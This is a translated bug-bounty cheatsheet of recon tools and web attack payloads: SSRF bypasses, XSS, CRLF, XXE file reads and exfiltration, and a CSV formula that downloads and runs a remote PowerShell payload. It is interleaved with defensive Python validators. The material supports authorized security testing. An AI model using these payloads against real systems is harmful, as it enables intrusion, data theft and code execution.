Preface
I have recently been reading the bugbountyforum interviews with bounty hunters, along with a number of slide decks in which they share techniques, so I have used the bugbounty-cheatsheet project as a base to organize the tools, methods and ways of thinking they use. This is only a list, not a detailed guide: the common techniques are not written up here, and it still needs to be filled in over time.
Bug bounty platforms
HackerOne, Bugcrowd, BountyFactory, Intigriti, Bugbountyjp, Synack, Zerocopter, Cobalt, Yogosha
Tools and tips
Online domain reconnaissance:
https://dnsdumpster.com
http://threatcrowd.org
https://publicwww.com (searches for domains inside JS and CSS; paid)
http://reverseip.domaintools.com (reverse IP lookup, i.e. other hosts in the same C-class range)
https://mxtoolbox.com
https://virustotal.com
https://crt.sh/?q=%25.uber.com
https://google.com/transparencyreport/https/ct/
https://pentest-tools.com/information-gathering/google-hacking
https://censys.io/certificates?q=
Tips for subdomain-collection tools
Use sublist3r.py to collect subdomains for several sites at once. The command below reads the targets from the domains file and writes each site's subdomains to a .txt file named after it:
cat domains | xargs -n1 -i{} python sublist3r.py -d {} -o {}.txt
Use apktool and LinkFinder to pull domain names out of an APP (provided the APP is not encrypted or obfuscated):
apktool d app.apk; cd app;mkdir collection; find . -name \*.smali -exec sh -c "cp {} collection/\$(head /dev/urandom | md5sum | cut -d' ' -f1).smali" \;; python /root/linkfinder/linkfinder.py -i 'collection/*.smali' -o cli
Taking one APP as an example: the detailed results can be found in output.html.
Aquatone: a one-shot wrapper for the full run
Write the following into aqua.sh and run ./aqua.sh xx.com (these are the subcommands of the original Ruby Aquatone; the later Go rewrite has a different interface):
aquatone-discover -d $1 && aquatone-scan -d $1 --ports huge && aquatone-takeover -d $1 && aquatone-gather -d $1
Get all the links on a page:
lynx -dump http://www.xxxxx.com/ | awk '/http/{print $2}'
Other tools that come up frequently: Intrigue-core, massdns, EyeWitness.
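The LinkFinder and lynx pipelines above both end with a pile of URLs that still has to be reduced to in-scope hosts. The Python below is an added example, not code from the original page or from LinkFinder, that does that reduction over a constructed sample of smali strings and HTML (the domains in it are placeholders). The scope test keeps the leading dot so that a look-alike such as example.com.evil.net is not treated as a subdomain of example.com.

```python
import re

# Constructed sample input (not a real target): strings of the kind apktool
# leaves in .smali files, plus a fragment of an HTML page.
SAMPLE_SMALI = '''
const-string v0, "https://api.example.com/v1/login"
const-string v1, "https://api.example.com/v1/users/"
const-string v2, "http://cdn.thirdparty.net/sdk.js"
const-string v3, "https://example.com.evil.net/track"
'''
SAMPLE_HTML = ('<a href="https://www.example.com/about">About</a> '
               '<a href="https://blog.example.com:8443/">Blog</a>')

# Absolute http(s) URLs; the path stops at whitespace, quotes or closing brackets.
URL_RE = re.compile(r'https?://[A-Za-z0-9.-]+(?::\d+)?(?:/[^\s"\'<>)\]]*)?')


def extract_urls(text):
    """Unique absolute URLs in first-seen order (what LinkFinder or lynx hands you)."""
    seen = []
    for m in URL_RE.finditer(text):
        if m.group(0) not in seen:
            seen.append(m.group(0))
    return seen


def hostname(url):
    """Host part of a URL without scheme, port or path."""
    return url.split("://", 1)[1].split("/", 1)[0].split(":", 1)[0].lower()


def in_scope_hosts(urls, scope):
    """Hosts that are an in-scope domain or a subdomain of one. The suffix test
    includes the leading dot, so example.com.evil.net does not match example.com."""
    hosts = sorted({hostname(u) for u in urls})
    return [h for h in hosts if any(h == d or h.endswith("." + d) for d in scope)]


if __name__ == "__main__":
    urls = extract_urls(SAMPLE_SMALI + SAMPLE_HTML)
    print("\n".join(urls))
    print("in scope:", in_scope_hosts(urls, ["example.com"]))
```

Feed it the concatenated .smali files or a lynx dump instead of the sample text; the scope list is the one from the program's brief, since out-of-scope hosts found this way are not yours to test.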
Vulnerability payloads and bypass tricks
SSRF:
Alternative spellings of an IPv4 address that string-matching blocklists miss: http://0177.1/ (octal), http://0x7f.1/ (hex), https://520968996 (decimal form of a dotted address, here 31.13.91.36; convert with http://www.subnetmask.info/)
IPv6: http://[::1] http://[::]
Wildcard DNS (for example, most of the SSRF fixes reported on WooYun can be bypassed this way):
http://xip.io http://nip.io
Sites that log DNS resolutions and HTTP requests for you (like dnslog/ceye; see the FreeBuf article "HTTP Blind Attacks" for the technique):
http://dnsbin.zhack.ca (DNS) http://pingb.in (DNS) http://requestb.in (HTTP) https://www.mockbin.org/ (HTTP)
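The point of the octal, hex and decimal spellings is that the filter compares strings while the HTTP client hands the literal to the libc resolver, which accepts all of them. The Python below is an added example, not from the original page or the bugbounty-cheatsheet project: it generates those spellings, decodes the decimal form, and contrasts a string-matching blocklist with a check that decodes the literal with inet_aton and classifies the address that will actually be connected to. It assumes the fetching client uses the libc address syntax; hostnames are out of scope here and must be resolved and every returned address checked the same way (and re-checked at connect time, because of DNS rebinding).

```python
import ipaddress
import socket

# Constructed inputs using the same encodings as the list above; all are 127.0.0.1.
LOOPBACK_FORMS = ["127.0.0.1", "0177.1", "0x7f.1", "2130706433", "127.1", "0177.0.0.1"]


def ip_forms(dotted):
    """Octal, hex, decimal and dotless spellings of an IPv4 address that
    inet_aton (and therefore most HTTP clients) accept."""
    octets = [int(o) for o in dotted.split(".")]
    n = int.from_bytes(bytes(octets), "big")
    return {
        "decimal": str(n),
        "hex": "0x%08x" % n,
        "octal": "0%o.%d.%d.%d" % tuple(octets),
        # a.b form: b carries the low 24 bits, so 127.0.0.1 becomes 0177.1
        "octal_short": "0%o.%d" % (octets[0], (octets[1] << 16) | (octets[2] << 8) | octets[3]),
    }


def decimal_to_dotted(value):
    """Reverse of the decimal form (what http://www.subnetmask.info/ does)."""
    return str(ipaddress.IPv4Address(int(value)))


def naive_blocked(host):
    """String-matching blocklist that the alternative spellings slip past."""
    return host == "localhost" or host.startswith(("127.", "10.", "192.168.", "169.254."))


def resolved_blocked(host):
    """Decode the literal the way the resolver does, then classify the real address.
    IPv6 literals arrive bracketed ([::1]); everything else goes through inet_aton,
    which understands the octal/hex/decimal/short forms exactly as libc does."""
    literal = host.strip("[]")
    try:
        if ":" in literal:
            addr = ipaddress.ip_address(literal)
        else:
            addr = ipaddress.IPv4Address(socket.inet_aton(literal))
    except (OSError, ValueError):
        return True            # not an address literal we understand: refuse rather than guess
    return (addr.is_loopback or addr.is_private or addr.is_link_local
            or addr.is_reserved or addr.is_multicast or addr.is_unspecified)


if __name__ == "__main__":
    print(ip_forms("127.0.0.1"))
    print(decimal_to_dotted("520968996"))
    for form in LOOPBACK_FORMS:
        print(form, "naive:", naive_blocked(form), "resolved:", resolved_blocked(form))
```

The decimal and hex forms are also the ones to try when a filter decodes only the dotted notation; the check that survives is the one run on the address after decoding, not on the text the user sent.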
LFI:
../\ ..\/ /..\ /.. /%5c..
FFmpeg local file disclosure (Sohu, Youku and Tencent have all been affected): https://github.com/neex/ffmpeg-avi-m3u-xbin/blob/master/gen_xbin_avi.py
OPEN REDIRECT:
/%09/google.com
/%5cgoogle.com
//www.google.com/%2f%2e%2e
//www.google.com/%2e%2e
//google.com/
//google.com/%2f..
example.com%[email protected] (bypass)
More payloads: https://github.com/cujanovic/Open-Redirect-Payloads
XSS:
Xianzhi XSS challenge write-up: http://mp.weixin.qq.com/s/d_UCJusUdWCRTo3Vutsk_A
A general-purpose XSS polyglot payload:
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
Bypassing validation on a URL field (a tab character inside "javascript"; browsers strip it before parsing):
javas	cript://www.google.com/%0Aalert(1)
Markdown XSS
[a](javascript:confirm(1))
[a](javascript://www.google.com%0Aprompt(1))
[a](javascript://%0d%0aconfirm(1))
[a](javascript://%0d%0aconfirm(1);com)
[a](javascript:window.onerror=confirm;throw%201)
[a]: (javascript:prompt(1))
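The open-redirect payloads, the tab-in-javascript trick and the Markdown payloads all exploit the same gap: the application checks one reading of the URL while the browser uses another (after stripping tab/CR/LF, treating backslash as slash, decoding, or collapsing slashes). The Python below is an added example, not from the original page or the bugbounty-cheatsheet project, showing a naive "starts with a single slash" check beside a check that requires every reading of the target to stay on the site's own origin, and the same normalisation applied to a link-scheme allowlist for Markdown output. The origin https://example.com/ is an assumption.

```python
import re
from urllib.parse import unquote, urljoin, urlsplit

SITE = "https://example.com/"            # assumed: the application's own origin
SCHEME_RE = re.compile(r"^([A-Za-z][A-Za-z0-9+.-]*):")


def url_forms(target):
    """The two readings a checker must agree on: the value as sent, and the value
    percent-decoded once (servers often decode before redirecting). Both get
    tab/CR/LF removed and leading/trailing controls stripped (browsers do that),
    backslash read as slash, and runs of three or more slashes after the scheme
    collapsed to two, which browsers read as the start of an authority."""
    forms = []
    for t in (target, unquote(target)):
        t = re.sub(r"[\t\r\n]", "", t)
        t = re.sub(r"^[\x00-\x20]+|[\x00-\x20]+$", "", t).replace("\\", "/")
        t = re.sub(r"^([A-Za-z][A-Za-z0-9+.-]*:)?/{3,}", r"\g<1>//", t)
        forms.append(t)
    return forms


def naive_is_local(target):
    """The usual check these payloads bypass: one leading slash, not two."""
    return target.startswith("/") and not target.startswith("//")


def same_origin(url, site=SITE):
    resolved = urlsplit(urljoin(site, url))
    origin = urlsplit(site)
    return resolved.scheme == origin.scheme and resolved.hostname == origin.hostname


def is_safe_redirect(target, site=SITE):
    """Accept only if every reading of the target resolves to our own origin."""
    return all(same_origin(f, site) for f in url_forms(target))


def is_safe_link_scheme(href):
    """For Markdown/href output: a link with a scheme must be http(s) or mailto
    under both readings; scheme-less (relative) links pass."""
    for f in url_forms(href):
        m = SCHEME_RE.match(f)
        if m and m.group(1).lower() not in ("http", "https", "mailto"):
            return False
    return True


if __name__ == "__main__":
    for p in ["/%09/google.com", "/%5cgoogle.com", "//google.com/%2f..", "/account"]:
        print(p, "naive:", naive_is_local(p), "safe:", is_safe_redirect(p))
    for h in ["javascript://www.google.com%0Aprompt(1)", "javas\tcript://www.google.com/%0Aalert(1)", "/docs"]:
        print(repr(h), "link ok:", is_safe_link_scheme(h))
```

The "every reading must agree" rule is what catches userinfo tricks like example.com%2f@google.com: decoded it looks like a path on example.com, raw it is a URL whose host is google.com, and the browser uses the raw reading. Checking one form only reopens the door.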
Flash SWF XSS
ZeroClipboard: ZeroClipboard.swf?id=\"))}catch(e){confirm(/XSS./.source);}//&width=500&height=500&.swf
plUpload Player: plupload.flash.swf?%#target%g=alert&uid%g=XSS&
plUpload MoxiePlayer: Moxie.swf?target%g=confirm&uid%g=XSS (also works with Moxie.cdn.swf and other variants)
FlashMediaElement: flashmediaelement.swf?jsinitfunctio%gn=alert1
videoJS: video-js.swf?readyFunction=confirm and video-js.swf?readyFunction=alert%28document.domain%2b'%20XSS'%29
YUI "io.swf": io.swf?yid=\"));}catch(e){alert(document.domain);}//
YUI "uploader.swf": uploader.swf?allowedDomain=\%22}%29%29%29}catch%28e%29{alert%28document.domain%29;}//<
Open Flash Chart: open-flash-chart.swf?get-data=(function(){alert(1)})()
AutoDemo: control.swf?onend=javascript:alert(1)//
Adobe FLV Progressive: /main.swf?baseurl=asfunction:getURL,javascript:alert(1)// and /FLVPlayer_Progressive.swf?skinName=asfunction:getURL,javascript:alert(1)//
Banner.swf (generic): banner.swf?clickTAG=javascript:alert(document.domain);//
JWPlayer (legacy): player.swf?playerready=alert(document.domain) and /player.swf?tracecall=alert(document.domain)
SWFUpload 2.2.0.1: swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!confirm(1);// (several Chinese frameworks, ThinkPHP among them, have shipped a vulnerable copy of this)
Uploadify (legacy): uploadify.swf?movieName=%22])}catch(e){if(!window.x){window.x=1;confirm(%27XSS%27)}}//&.swf
FlowPlayer 3.2.7: flowplayer-3.2.7.swf?config={"clip":{"url":"http://edge.flowplayer.org/bauhaus.mp4","linkUrl":"JavaScriPt:confirm(document.domain)"}}&.swf
AngularJS template injection
CRLF:
Header injection (a bare %0d only works against servers that accept a lone CR as a line terminator; the %25- and %u-encoded forms only work where the server decodes a second time or understands %u encoding):
%0dSet-Cookie:csrf_token=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
%0d%0aheader:header
%0aheader:header
%0dheader:header
%23%0dheader:header
%3f%0dheader:header
/%250aheader:header
/%25250aheader:header
/%%0a0aheader:header
/%3f%0dheader:header
/%23%0dheader:header
/%25%30aheader:header
/%25%30%61header:header
/%u000aheader:header
CRLF through a redirect:
//www.google.com/%2f%2e%2e%0d%0aheader:header
/www.google.com/%2e%2e%2f%0d%0aheader:header
/google.com/%2F..%0d%0aheader:header
XSS through CRLF (inject a blank line to end the headers, then the body):
%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2e%2e
%0d%0aContent-Type:%20text%2fhtml%0d%0aHTTP%2f1.1%20200%20OK%0d%0aContent-Type:%20text%2fhtml%0d%0a%0d%0a%3Cscript%3Ealert('XSS');%3C%2fscript%3E
Reference: https://www.leavesongs.com/PENETRATION/Sina-CRLF-Injection.html
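To see what the payloads above do to a response, and what the fix looks like, here is an added example in Python (not from the original page or the bugbounty-cheatsheet project). It models the vulnerable pattern, a redirect built by string concatenation from an already-decoded parameter, parses the result the lenient way many clients do, and then shows the hardened check: decode exactly as many times as the server will, and reject any control character rather than trying to strip it. The payload strings are the decoded forms of two entries above, embedded as constructed inputs.

```python
import re
from urllib.parse import unquote


def build_redirect(location):
    """Vulnerable pattern: the (already URL-decoded) parameter is concatenated
    straight into the header block, so CR/LF inside it starts new header lines."""
    return "HTTP/1.1 302 Found\r\nLocation: " + location + "\r\nContent-Length: 0\r\n\r\n"


def parse_response(raw):
    """Read a raw response the lenient way many clients do: CRLF, bare CR and
    bare LF all end a line, and the first empty line ends the headers."""
    lines = re.split(r"\r\n|\r|\n", raw)
    headers, body = [], ""
    for i, line in enumerate(lines[1:], start=1):
        if line == "":
            body = "\n".join(lines[i + 1:])
            break
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return headers, body


def header_value_ok(value, decode_rounds=1):
    """Hardened check: apply the same number of percent-decodings the server
    performs, then reject any C0 control character or DEL outright."""
    for _ in range(decode_rounds):
        value = unquote(value)
    return not any(ord(c) < 0x20 or ord(c) == 0x7F for c in value)


def safe_redirect(location):
    if not header_value_ok(location):
        raise ValueError("control character in header value")
    return build_redirect(location)


# Constructed attacker inputs: the decoded form of two payloads listed above.
COOKIE_PAYLOAD = unquote("/%0d%0aSet-Cookie:csrf_token=" + "x" * 32 + ";")
XSS_PAYLOAD = unquote("%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a"
                      "<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2e%2e")

if __name__ == "__main__":
    headers, body = parse_response(build_redirect(COOKIE_PAYLOAD))
    print("injected headers:", headers)
    _, body = parse_response(build_redirect(XSS_PAYLOAD))
    print("injected body:", body)
    print("double-encoded %250a, decoded once:", header_value_ok("/%250aheader:header"),
          "decoded twice:", header_value_ok("/%250aheader:header", decode_rounds=2))
```

The decode_rounds parameter is the point of the /%250a and /%25%30%61 entries: a check that runs before a second decoding pass sees harmless text, so the validation has to sit at the point where the value is written into the header, after all decoding is done.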
CSV Injection:
%0A-3+3+cmd|' /C calc'!D2 (the leading newline gets past filters that only look at the first character)
Meterpreter shell: =cmd|'/C powershell IEX(wget bit.ly/1X146m3)'!A0
Reference: http://bobao.360.cn/learning/detail/2997.html
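The defensive side of the two payloads above is an export routine that neutralises formula-leading cells, and the %0A entry shows why the check has to skip leading whitespace first. The Python below is an added example, not from the original page or the bugbounty-cheatsheet project; the sample rows are constructed and the calc payload is a trimmed variant of the one above.

```python
import csv
import io

FORMULA_TRIGGERS = ("=", "+", "-", "@")


def csv_safe_cell(value):
    """Neutralise spreadsheet formula injection in one exported cell.

    Leading whitespace and control characters are skipped before the check, so
    the %0A trick (a newline in front of the formula) does not get around it.
    A triggering cell is prefixed with an apostrophe, which Excel and LibreOffice
    read as "store as text". Values such as -5 get escaped too; that is the price
    of not trying to guess which of them are formulas.
    """
    if not isinstance(value, str):
        return value
    leading = value.lstrip(" \t\r\n\x0b\x0c")
    if leading.startswith(FORMULA_TRIGGERS):
        return "'" + value
    return value


def write_csv(rows):
    """Render rows with every cell sanitised and quoted."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL)
    for row in rows:
        writer.writerow([csv_safe_cell(c) for c in row])
    return buf.getvalue()


# Constructed export rows containing decoded forms of the payloads above.
SAMPLE_ROWS = [
    ["user", "note"],
    ["alice", "=cmd|'/C calc'!A0"],
    ["bob", "\n-3+3+cmd|' /C calc'!D2"],
    ["carol", "plain text"],
]

if __name__ == "__main__":
    print(write_csv(SAMPLE_ROWS))
```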
XXE Injection:
File read:
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<foo>&xxe;</foo>
Out-of-band exfiltration (the first request returns nothing; the data arrives in the request to your server). Note that well-formed XML does not allow a parameter-entity reference such as %xxe; inside an entity declaration in the internal subset, so most parsers reject this exactly as written; in practice the same declarations are served from an external DTD on a host you control.
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY % xxe SYSTEM "file:///etc/passwd">
<!ENTITY blind SYSTEM "https://www.example.com/?%xxe;">]>
<foo>&blind;</foo>
PHP case (php://filter base64-encodes what it reads, so the content survives XML parsing):
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY ac SYSTEM "php://filter/read=convert.base64-encode/resource=http://example.com/viewlog.php">]>
<foo><result>&ac;</result></foo>
Detecting SSRF (the parser fetches the URL; watch for the request on a server you control):
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "https://www.example.com/text.txt">]>
<foo>&xxe;</foo>
XEE (XML entity expansion, denial of service: https://yq.aliyun.com/articles/8723)
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
XEE (remote entity):
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY test SYSTEM "https://example.com/entity1.xml">]>
<lolz><lol>3..2..1...&test;</lol></lolz>
Exfiltrating data over the FTP protocol (file read and directory listing on a Sogou site: blind XXE in a Java environment)
Details: http://www.freebuf.com/articles/web/97833.html
https://github.com/RUB-NDS/DTD-Attacks
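The file-read, out-of-band and entity-expansion documents above can all be recognised before parsing, and the expansion one can be sized without expanding anything: lol is 3 bytes and each level multiplies by 10, so &lol9; is 3,000,000,000 bytes from a 1 KB input. The Python below is an added example, not from the original page, the bugbounty-cheatsheet project or DTD-Attacks. It parses entity declarations with a regex (a triage tool, not an XML parser), flags external entities, computes the expanded size of every internal entity, and treats a reference cycle (illegal XML, but cheap to send) as its own verdict. The real fix remains disabling DTD processing or external entities in the parser; this check is for triaging submissions or fuzzing output.

```python
import re

ENTITY_DECL = re.compile(
    r'<!ENTITY\s+(%\s*)?([\w.-]+)\s+(?:"([^"]*)"|\'([^\']*)\'|(SYSTEM|PUBLIC)\b[^>]*)>', re.S)
ENTITY_REF = re.compile(r'&([\w.-]+);')


def parse_entities(xml_text):
    """Internal entities (name -> replacement text) and names of external ones."""
    internal, external = {}, []
    for m in ENTITY_DECL.finditer(xml_text):
        _, name, dq, sq, ext = m.groups()
        if ext:
            external.append(name)
        else:
            internal[name] = dq if dq is not None else sq
    return internal, external


def expanded_size(name, internal, memo):
    """Bytes that fully expanding &name; would produce, computed without
    expanding anything. Raises ValueError on a reference cycle."""
    if name in memo:
        if memo[name] is None:
            raise ValueError("recursive entity " + name)
        return memo[name]
    memo[name] = None                                     # marks "in progress"
    value = internal.get(name, "")
    size = len(ENTITY_REF.sub("", value))                 # literal bytes
    size += sum(expanded_size(r, internal, memo) for r in ENTITY_REF.findall(value))
    memo[name] = size
    return size


def classify(xml_text, max_expansion=1_000_000):
    """Pre-parse triage: 'ok' without a DOCTYPE; 'external-entity' if any SYSTEM
    or PUBLIC entity is declared (XXE/SSRF surface); 'entity-expansion' if any
    internal entity would expand past max_expansion bytes."""
    if not re.search(r"<!DOCTYPE", xml_text):
        return "ok"
    internal, external = parse_entities(xml_text)
    if external:
        return "external-entity"
    memo = {}
    try:
        worst = max((expanded_size(n, internal, memo) for n in internal), default=0)
    except ValueError:
        return "recursive-entity"
    return "entity-expansion" if worst > max_expansion else "ok"


def billion_laughs(depth=9, fanout=10):
    """Generate the lolz document above: lol = 3 bytes, each level times fanout."""
    decls = ['<!ENTITY lol "lol">', '<!ELEMENT lolz (#PCDATA)>']
    for i in range(1, depth + 1):
        prev = "lol" if i == 1 else "lol%d" % (i - 1)
        decls.append('<!ENTITY lol%d "%s">' % (i, ("&%s;" % prev) * fanout))
    return ('<?xml version="1.0"?>\n<!DOCTYPE lolz [\n' + "\n".join(decls)
            + '\n]>\n<lolz>&lol%d;</lolz>' % depth)


# The file-read payload from above, as a constant for the checks.
FILE_READ = ('<?xml version="1.0"?><!DOCTYPE foo [<!ELEMENT foo ANY>'
             '<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>')

if __name__ == "__main__":
    doc = billion_laughs()
    print(len(doc), "bytes of input;", expanded_size("lol9", parse_entities(doc)[0], {}), "bytes expanded")
    print(classify(FILE_READ), classify(doc), classify("<foo>bar</foo>"))
```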
Template injection:
Ruby (ERB): <%=`id`%>
Twig: {{7*'7'}} outputs 49 (PHP coerces '7' to a number)
Jinja2: {{7*'7'}} outputs 7777777 (Python string repetition), which is how the two engines are told apart
XSLT injection
Gathering information about the processor:
<?xml version="1.0" encoding="UTF-8"?>
<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
<body>
<xsl:text>xsl:vendor = </xsl:text><xsl:value-of select="system-property('xsl:vendor')"/><br/>
<xsl:text>xsl:version = </xsl:text><xsl:value-of select="system-property('xsl:version')"/><br/>
</body>
</html>
PHP exploitation (works when the application has called XSLTProcessor::registerPHPFunctions(), which enables the php: namespace):
<?xml version="1.0" encoding="UTF-8"?>
<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
<body>
<xsl:value-of select="php:function('phpinfo')"/>
</body>
</html>
Closing
This article is a translated summary of the open-source project bugbounty-cheatsheet (https://github.com/EdOverflow/bugbounty-cheatsheet/). The translator was short on time and has not verified everything in detail, so if you spot a mistake or want to contribute ideas, contact me on WeChat: bbqcms.